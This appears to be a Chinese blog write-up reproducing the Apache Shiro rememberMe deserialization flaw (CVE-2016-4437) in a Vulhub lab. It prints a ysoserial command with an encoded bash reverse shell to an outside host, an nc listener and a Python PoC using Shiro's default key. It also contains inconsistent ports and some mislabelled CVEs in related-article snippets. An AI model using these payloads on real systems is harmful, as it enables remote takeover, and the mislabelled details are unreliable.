Apache Shiro Remember Me 反序列化漏洞 CVE-2016-4437 Shiro-550 漏洞复现

最新推荐文章于 2025-03-15 11:31:49 发布
最新推荐文章于 2025-03-15 11:31:49 发布
阅读量3.9k 收藏 5
点赞数 2
分类专栏: 漏洞复现 文章标签: shiro CVE-2016-4437 Remember Me Shiro-550 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44037296/article/details/116304433
版权

Apache Shiro Remember Me 反序列化漏洞 CVE-2016-4437 Shiro-550 漏洞复现

一、 漏洞描述

Apache Shiro 框架提供了记住用户功能,即 Remember Me 功能,用户登录成功后会生成经过加密编码的 Cookie。Cookie 的键为rememberMe ,值是经过对相关信息进行反序列化后,使用 AES 加密,最后使用 Base64 编码处理。

服务器端 Cookie 处理流程:

  1. 检索 Cookie 中rememberMe的值;
  2. Base64 解码;
  3. AES 解密(加密密钥硬编码)
  4. 反序列化操作(未做过滤处理)

Shiro 默认使用了 CookieRememberMeManager,加密的用户信息序列化后存储在名为rememberMe 的Cookie 中。攻击者可以使用 Shiro 的默认密钥伪造用户 Cookie ,触发 Java 反序列化漏洞,进而在目标机器上执行任意命令。

二、漏洞影响

Apache Shiro <= 1.2.4

三、漏洞复现

1、 环境搭建

使用 Vulhub 在服务器上搭建

cd /vulhub/shiro/CVE-2016-4437
docker-compose up -d

访问127.0.0.1:8080,进入到登录页面:
在这里插入图片描述

2、 漏洞复现

第一步:判断是否存在漏洞:
随意输入用户名及密码,并且勾选Remember me选项:
在这里插入图片描述
使用 BurpSuite 抓取数据包后,使用 Repeater 模块发送数据包:
在这里插入图片描述
其相应包Set-Cookie头信息中存在rememberMe=deleteMe;,判断其使用了CookieRememberMeManager。

第二步:漏洞利用

  1. 对反弹shell代码进行加密:
    在线工具
    在这里插入图片描述
  2. 在攻击机中使用ysoseria中的 JRMP 监听模块,监听10099端口:
java -cp ysoserial-0.0.8-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 10099 CommonsCollections5 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzc5ODkgMD4mMQ==}|{base64,-d}|{bash,-i}'
  1. 在攻击机另一个终端中检测反弹shell的端口7898
nc -lvnp 7898
  1. 攻击机中生成Cookie:
    使用poc.py生成rememberMe的值:
# IP 替换为攻击机地址,端口为 JRMP 监听端口,可自由替换
python3 poc.py 1.1.1.1:10099

在这里插入图片描述

  1. 得到生成的值,替换抓取到的数据包中的 Cookie :
    在这里插入图片描述
  2. 发送数据包,在 JRMP 监听中得到回显:
    在这里插入图片描述
  3. 成功在7989端口获取目标 shell:
    在这里插入图片描述

四、漏洞POC

import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES

def encode_rememberme(command):
    popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.8-SNAPSHOT-all.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
    BS = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
    iv = uuid.uuid4().bytes
    encryptor = AES.new(key, AES.MODE_CBC, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext


if __name__ == '__main__':
    payload = encode_rememberme(sys.argv[1])    
    print("rememberMe={0}".format(payload.decode()))

五、参考链接

https://www.freebuf.com/vuls/178014.html

六、利用工具

ShiroScan
ShiroScan图形化

Apache Shiro 1.2.4反序列化漏洞(Shiro-550)--Shiro rememberMe反序列化漏洞(CVE-2016-4437)
薛定谔嘚喵博客
05-10 1913
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。
Shiro550 反序列化漏洞CVE-2016-4437
qq_68163788的博客
06-20 1249
Apache Shiro是一个强大而易用的Java安全框架,专注于提供认证、授权、加密和会话管理等安全功能。Shiro旨在简化安全性,通过直观的设计和简单的API使安全功能的集成变得轻松。开发人员可以选择多种认证方式,灵活地管理用户的角色和权限,以确保对资源的安全访问。此外,Shiro还提供了便捷的加密工具,用于保护敏感数据的存储和传输。综合来看,Apache Shiro是一款功能全面且易于使用的安全框架,为开发人员提供了完善的安全解决方案,帮助他们构建安全可靠的应用程序。
Shiro RememberMe 反序列化漏洞
hbxf_xs的博客
11-27 2186
Apache Shiro 反序列化漏洞 1)、Apache Shiro框架提供了记住我的功能(RememberMe),用户登陆成功后会生成经过加密并编码的cookie。cookie的key为RememberMe,cookie的值是经过对相关信息进行序列化,然后使用aes加密,最后在使用base64编码处理形成的。 在服务端接收cookie值时,按照如下步骤来解析处理: 1、检索RememberMe cookie 的值 2、Base 64解码 3、使用AES解密(加密密钥硬编码) 4、进行反序列化操作(未作
Apache Shiro Java反序列化漏洞分析
2301_77512689的博客
04-18 597
最终利用ysoserial的CommonsBeanutils1命令执行。虽然在ysoserial里CommonsBeanutils1的版本为1.9.2,不过上面环境测试确实可以命令执行。这里当时有一个问题是:如何获取Java里引用组件的版本?大多数的时候,我们只要解析pom.xml就能解析出相应组件的版本。但有的情况下,并不能获取组件的版本。比如有的pom.xml并没有设置组件的version版本,没有设置version的情况,是由依赖决定。项目中依赖了A,A依赖了B,B的版本由A决定;
CVE - 2020 - 1938 漏洞复现Apache Shiro 反序列化漏洞深入剖析
最新发布
m0_67544876的博客
03-15 1297
通过本次 CVE - 2020 - 1938 漏洞复现,我们深入了解了 Apache Shiro 反序列化漏洞的原理和利用方式。反序列化漏洞是一种严重的安全威胁,攻击者可以利用它绕过安全机制,在目标系统上执行任意代码。因此,开发者和系统管理员需要高度重视软件的安全更新,及时修复已知漏洞,加强安全防护措施,确保系统的安全性和稳定性。同时,安全研究人员也可以通过对这漏洞的研究,不断提升自己的安全技术水平,为保障网络安全贡献力量。
shiro反序列化
热门推荐
weixin_48776804的博客
05-12 1万+
shiro反序列化
Apache Shiro RememberMe 1.2.4 反序列化漏洞
ddr12231的博客
08-08 1663
拉取镜像 docker pull medicean/vulapps:s_shiro_1 启动环境 docker run -d -p 80:8080 medicean/vulapps:s_shiro_1 拉取镜像中.....呵呵 ! 网太慢,有时间再弄 转载于:https://www.cnblogs.com/mrhonest/p/11320498.html...
Apache Shiro remember Me反序列化漏洞Shiro 550复现
一位热爱网安的年轻人的博客
01-11 1180
Apache Shiro remember Me反序列化漏洞Shiro 550复现
Apache ShiroRemember Me
王浩的技术博客
10-18 318
Shiro中提供“记住我”的功能,其与已认证有着明显的区别: l Remembered(记住我):一个记住我的Subject 不是匿名的,而且有一个已知的身份ID(也就是subject.getPrincipals()是空的)。但是这个被记住的身份ID 是在之前的session 中被认证的。如果subject.isRemembered()返回true,则Subject 被认为是被记住的。 l...
Apache Shiro 1.2.4反序列化漏洞CVE-2016-4437复现
yukinorong的博客
06-29 3381
基础知识 序列化和反序列化 反序列化漏洞原因 在Java反序列化中,会调用被反序列化的readObject方法,当readObject方法书写不当时就会引发漏洞反序列化的检测 基础库中隐藏的反序列化漏洞 优秀的Java开发人员一般会按照安全编程规范进行编程,很大程度上减少了反序列化漏洞的产生。并且一些成熟的Java框架比如Spring MVC、Struts2等,都有相应的防范反序列化的机制。如果仅仅是开发失误,可能很少会产生反序列化漏洞,即使产生,其绕过方法、利用方式也较为复杂。但
漏洞复现Shiro rememberMe反序列化漏洞CVE-2016-4437
weixin_45556536的博客
11-11 1838
shrio反序列化漏洞 一、漏洞介绍 Shiro 是 Java 的一个安全框架。Apache Shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值 > Base64解码–>AES解密–>反序列化。然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。 二、影响范围 Apache Shiro <= 1.2.4 三、漏洞复现 恶意 Cookie rememberMe值构造前1
Shiro721 反序列化漏洞CVE-2019-12422)
qq_68163788的博客
06-21 2447
Apache Shiro 是一个功能强大且灵活的开源安全框架,可以干净地处理身份验证,授权,企业会话 Management 和加密。 Apache Shiro 的首要目标是易于使用和理解。安全有时可能常复杂,甚至会很痛苦,但不一定如此。框架应尽可能掩盖复杂性,并公开干净直观的 API,以简化开发人员确保其应用程序安全的工作。
漏洞分析 | 经典的Shiro反序列化
2301_80115097的博客
03-26 2419
其实这个还是得学习学习加密解密的方法,才能进行编写poc,但是此处只是了解个思路。具体可参考其他文章;声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!免费领取安全学习资料包!渗透工具技术文档、书籍面试题帮助你在面试中脱颖而出视频基础到进阶环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等应急响应笔记学习路线。
shiro反序列化漏洞
qq_41696518的博客
06-27 1660
在请求包的Cookie中为 rememberMe字段赋任意值,收到返回包的 Set-Cookie 中存在 rememberMe=deleteMe 字段,说明目标有使用Shiro框架,可以进一步测试。,然后将其作为cookie的rememberMe字段发送,ShirorememberMe进行解密并且反序列化,最终造成反序列化漏洞。硬编码要求程序的源代码在输入数据或所需格式发生变化时进行更改,以便最终用户可以通过程序外的某种方式更改细节。在攻击机:192.168.43.131 中生成rememberMe
Apache Shiro反序列化漏洞复现
weixin_74075073的博客
02-23 390
Apache Shiro反序列化漏洞CVE-2016-4437)(也叫Shiro550)Apache Shiro反序列化漏洞CVE-2016-4437)(也叫Shiro550)当用户勾选“RememberMe”选项并成功登录时,Shiro会在Cookie中存储加密后的用户信息。如果攻击者能够获取到加密密钥,就可以替换Cookie中的用户信息为恶意代码,从而在服务端解密时触发反序列化漏洞,执行任意代码。Apache Shiro默认使用CookieRememberMeManager。
Shiro rememberMe反序列化漏洞(Shiro-550)
2201_75891821的博客
08-07 353
Apache Shiro是⼀个强⼤易⽤的Java安全框架,提供了认证、授权、加密和会话管理等功 能。Shiro框架直观、易⽤,同时也能提供健壮的安全性。
apache shiro - 550反序列化漏洞
01-05
### 关于Apache Shiro 550反序列化漏洞详情 对于Apache Shiro存在的反序列化漏洞,具体到CVE编号为CVE-2016-4437CVE-2022-42889。此漏洞存在于Apache Shiro<=1.2.4版本中,在返回包的Set-Cookie中存在`rememberMe=deleteMe`字段可以作为识别该漏洞的一个标志[^1]。 当应用程序使用了不安全的方式处理rememberMe功能时,攻击者可以通过构造恶意输入来触发Java对象的反序列化过程,从而执行任意代码。这一特性使得攻击者能够在服务器端运行未经许可的操作,造成严重的安全隐患[^3]。 为了检测是否存在上述提到的安全风险,可借助专门开发出来的工具如ShiroExploit来进行测试;这些工具能够帮助确认目标环境是否容易受到此攻击的影响,并提供相应的证据支持[^4]。 ### 修复措施建议 针对已知的Apache Shiro反序列化漏洞(CVE-2016-4437),官方推荐升级至更高版本以获得最新的安全性改进和支持。除了及时更新软件外,还应采取其他预防性策略: - **禁用Remember Me功能**:如果业务逻辑允许的话,考虑完全关闭记住我的选项。 - **加强依赖库管理**:定期审查项目所使用的第三方组件及其版本号,确保它们都是最新且经过充分审计的状态。 - **实施严格的输入验证机制**:无论是来自客户端还是内部服务之间的通信数据都应该被仔细过滤和校验,防止潜在危险载荷进入系统核心区域。 ```bash # 更新Shiro到最新稳定版 mvn install:install-file -Dfile=/path/to/apache-shiro-core-latest.jar \ -DgroupId=org.apache.shiro \ -Dversion=<new_version> \ -Dpackaging=jar ```
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值